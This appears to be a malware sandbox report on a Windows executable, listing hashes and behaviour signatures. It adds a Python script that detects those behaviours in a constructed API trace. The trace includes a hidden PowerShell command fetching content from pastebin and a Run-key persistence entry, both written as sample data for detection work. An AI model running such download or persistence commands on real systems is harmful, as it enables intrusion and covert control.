General

  • Target

    70f758a17090a074e26662dee56282d991ce55a6.exe

  • Size

    45KB

  • Sample

    241113-yxnyys1rfj

  • MD5

    0ffb0e04f66e70f0cd320df2db61999e

  • SHA1

    70f758a17090a074e26662dee56282d991ce55a6

  • SHA256

    9677f7bc0da5cb2654fb6cc9e0ac3c65208c69cc1d4e7aa7707a30133d058621

  • SHA512

    c287b991970602307b7ebba6d95acc5b02e0d753565a5c1b4622bd94161912e891ec2896f964bf7f350f72f6ed5eeaa41f9116e63c9cfeea61d40067ed9f79a1

  • SSDEEP

    768:FeVp2VD9ncfBhrcXnbvOpXBrWB2pRULQe9SOf4hYB6S5GPvr/Sw:FeVYD96GvOpXBrHGse9QhYoqGPz/Sw

Malware Config

Targets

    • Target

      70f758a17090a074e26662dee56282d991ce55a6.exe

    • Sets file to hidden

      Modifies file attributes (FILE_ATTRIBUTE_HIDDEN) so the file is not shown by Explorer and other tools in their default view.

    • Checks computer location settings

      Reads the country code configured in the registry (the Geo\Nation value under HKCU\Control Panel\International), most likely as a geofence check before running further.

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Command and Scripting Interpreter: PowerShell

      Launches powershell.exe to run commands.

    • Legitimate hosting services abused for malware hosting/C2
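
The signature list above, re-derived as detection rules over a user-mode API-call trace. This is an added example, not the sandbox's own signature code and not output captured from this sample: the trace, file paths, process IDs, registry data and the short list of hosting domains are all constructed for illustration, and the record layout mirrors a generic API monitor rather than any particular sandbox's schema.

```python
"""Reproduce the report's behaviour signatures from a constructed API-call trace."""
import re

FILE_ATTRIBUTE_HIDDEN = 0x2  # winnt.h
# Assumed, illustrative list of services commonly abused for payload hosting/C2.
HOSTING_DOMAINS = {"pastebin.com", "raw.githubusercontent.com", "cdn.discordapp.com"}
URL_RE = re.compile(r"https?://([^/\s\"']+)", re.I)

# Constructed trace: one record per hooked API call, in call order.
# pid 1001 is the analysed sample, pid 1002 a process it spawned. All paths
# and data are made up for the example.
TRACE = [
    {"pid": 1001, "api": "RegQueryValueExW", "key": r"HKCU\Control Panel\International\Geo", "value": "Nation"},
    {"pid": 1001, "api": "CreateFileW", "path": r"C:\Users\user\AppData\Roaming\svc\update.exe", "write": True},
    {"pid": 1001, "api": "CreateFileW", "path": r"C:\Users\user\AppData\Roaming\svc\helper.dll", "write": True},
    {"pid": 1001, "api": "SetFileAttributesW", "path": r"C:\Users\user\AppData\Roaming\svc\update.exe", "attrs": 0x22},
    {"pid": 1001, "api": "RegSetValueExW", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "svc", "data": r"C:\Users\user\AppData\Roaming\svc\update.exe"},
    {"pid": 1001, "api": "CreateProcessW", "cmdline": r'"C:\Users\user\AppData\Roaming\svc\update.exe" /silent', "child_pid": 1002},
    {"pid": 1002, "api": "LoadLibraryW", "path": r"C:\Users\user\AppData\Roaming\svc\helper.dll"},
    {"pid": 1002, "api": "CreateProcessW", "cmdline": 'powershell.exe -nop -w hidden -c "iwr https://pastebin.com/raw/EXAMPLE"', "child_pid": 1003},
]


def first_token(cmdline):
    """Image path from a command line, honouring a quoted first argument."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        return cmdline[1:cmdline.index('"', 1)]
    return cmdline.split()[0]


def _dropped_then_used(trace, use_api, path_of):
    """Paths written earlier in the trace and then consumed by `use_api` (order matters)."""
    dropped, hits = set(), []
    for e in trace:
        if e["api"] == "CreateFileW" and e.get("write"):
            dropped.add(e["path"].lower())
        elif e["api"] == use_api:
            p = path_of(e).lower()
            if p in dropped:
                hits.append(p)
    return hits


def sets_file_hidden(trace):
    return [e["path"] for e in trace
            if e["api"] == "SetFileAttributesW" and e["attrs"] & FILE_ATTRIBUTE_HIDDEN]


def checks_location(trace):
    # Reads of the configured GeoID, the usual basis for a geofence check.
    return [e for e in trace if e["api"] == "RegQueryValueExW"
            and e["key"].lower().endswith(r"control panel\international\geo")
            and e["value"].lower() == "nation"]


def executes_dropped_exe(trace):
    return _dropped_then_used(trace, "CreateProcessW", lambda e: first_token(e["cmdline"]))


def loads_dropped_dll(trace):
    return _dropped_then_used(trace, "LoadLibraryW", lambda e: e["path"])


def adds_run_key(trace):
    return [(e["value"], e["data"]) for e in trace if e["api"] == "RegSetValueExW"
            and re.search(r"\\currentversion\\run(once)?$", e["key"].lower())]


def uses_powershell(trace):
    ps = re.compile(r'^"?([^"\s]*\\)?(powershell|pwsh)\.exe', re.I)
    return [e["cmdline"] for e in trace if e["api"] == "CreateProcessW" and ps.match(e["cmdline"])]


def abuses_hosting(trace):
    hits = []
    for e in trace:
        if e["api"] == "CreateProcessW":
            hits += [h.lower() for h in URL_RE.findall(e["cmdline"]) if h.lower() in HOSTING_DOMAINS]
    return hits


def signatures(trace):
    """Map of report signature name -> supporting evidence, omitting rules with no hits."""
    rules = {
        "Sets file to hidden": sets_file_hidden,
        "Checks computer location settings": checks_location,
        "Executes dropped EXE": executes_dropped_exe,
        "Loads dropped DLL": loads_dropped_dll,
        "Adds Run key to start application": adds_run_key,
        "Command and Scripting Interpreter: PowerShell": uses_powershell,
        "Legitimate hosting services abused for malware hosting/C2": abuses_hosting,
    }
    return {name: hits for name, fn in rules.items() if (hits := fn(trace))}


if __name__ == "__main__":
    for name, evidence in signatures(TRACE).items():
        print(f"{name}: {evidence}")
```

The dropped-file rules deliberately require the write to precede the execution or load, so a pre-existing binary in the same directory does not count as "dropped"; the PowerShell rule matches on the image name at the head of the command line rather than anywhere in it, which avoids flagging a file that merely mentions powershell in an argument. Sysmon does not record registry reads, so the location-settings rule needs API-level or EDR telemetry rather than Sysmon event 13.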

MITRE ATT&CK Enterprise v15

Tasks